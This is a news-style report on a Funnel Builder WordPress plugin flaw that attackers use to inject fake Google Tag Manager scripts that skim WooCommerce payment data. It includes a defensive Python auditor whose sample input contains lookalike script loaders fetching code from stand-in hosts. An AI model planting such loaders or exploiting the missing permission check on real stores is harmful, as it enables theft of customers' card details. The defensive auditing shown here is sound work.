A significant security vulnerability in the Funnel Builder plugin for WordPress is actively being exploited to compromise WooCommerce checkout pages. By injecting malicious JavaScript, attackers aim to steal sensitive payment data from unsuspecting users. This alarming development has raised concerns among thousands of WooCommerce store owners.
Details of the Vulnerability
The security issue was brought to light by Sansec, a Dutch e-commerce security firm, which detailed the exploitation techniques in a recent report. The vulnerability impacts all versions of the Funnel Builder plugin prior to 3.15.0.3, affecting over 40,000 WooCommerce installations. Despite the absence of an official CVE identifier, the flaw’s potential for harm has prompted urgent action.
This vulnerability allows unauthorized individuals to inject arbitrary JavaScript into every checkout page on the affected stores. In response, FunnelKit, the developers of Funnel Builder, have issued a critical patch in version 3.15.0.3 to address the flaw.
Methods of Exploitation
According to Sansec, attackers exploit this vulnerability by adding fake Google Tag Manager scripts through the plugin’s ‘External Scripts’ setting. These scripts mimic legitimate analytics tags but secretly deploy a payment skimmer. This skimmer captures sensitive information, including credit card numbers, CVVs, and billing addresses, during the checkout process.
The core issue lies in the plugin's publicly exposed checkout endpoint. Versions before the fix allowed incoming requests to execute internal methods without verifying the caller's permissions. This missing permission check lets attackers write harmful code into the plugin's global settings, which affects every checkout page.
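A defender-side check for the injection described above, as an added example that is not code from Sansec, FunnelKit or the plugin: it parses the text stored in the 'External Scripts' setting and reports every script URL whose host is not exactly on an allowlist, which catches tags that only imitate Google Tag Manager. The allowlist, the sample snippet, the lookalike hosts and the function names are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Assumption: the tag hosts this store legitimately uses. Adjust per store.
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}
URL_RE = re.compile(r"""(?:https?:)?//[^\s'"<>)]+""", re.I)

# Constructed sample of an 'External Scripts' value: one real GTM tag, two lookalikes.
SAMPLE = """<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXXX"></script>
<script>(function(w,d,s){var j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com.cdn-tags.example/gtm.js?id=GTM-XXXXXXX';
d.head.appendChild(j);})(window,document,'script');</script>
<script src="//googletagmanager.example.net/gtm.js"></script>"""

class ScriptAudit(HTMLParser):
    """Collects URLs from <script src> attributes and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.in_script, self.urls = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            src = dict(attrs).get("src")
            if src:
                self.urls.append(("src", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:  # inline loaders build the URL in JavaScript
            self.urls += [("inline", u) for u in URL_RE.findall(data)]

def audit_external_scripts(setting_value):
    """Return (kind, host, url) for every script URL not on the allowlist."""
    parser = ScriptAudit()
    parser.feed(setting_value)
    parser.close()
    findings = []
    for kind, url in parser.urls:
        # Exact host match only: a substring test would pass lookalike domains.
        full = url if "://" in url else "https:" + url
        host = urlparse(full).hostname or ""
        if host not in ALLOWED_HOSTS:
            findings.append((kind, host, url))
    return findings
```

Calling audit_external_scripts(SAMPLE) returns the two lookalike entries and leaves the genuine tag alone; a relative src with no host is reported with an empty host so it still gets reviewed.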
Preventive Measures and Future Outlook
To mitigate this risk, store owners using the Funnel Builder plugin are urged to update to version 3.15.0.3 immediately. The update patches the vulnerability, protecting customer data from skimming attacks.
As the cybersecurity landscape evolves, maintaining vigilance over plugin security has become paramount. Developers and store owners must prioritize regular updates and security audits to protect against emerging threats.
In conclusion, the swift response to the Funnel Builder vulnerability highlights the ongoing battle against cyber threats in the e-commerce sector. By staying informed and proactive, businesses can better shield themselves and their customers from malicious activities.
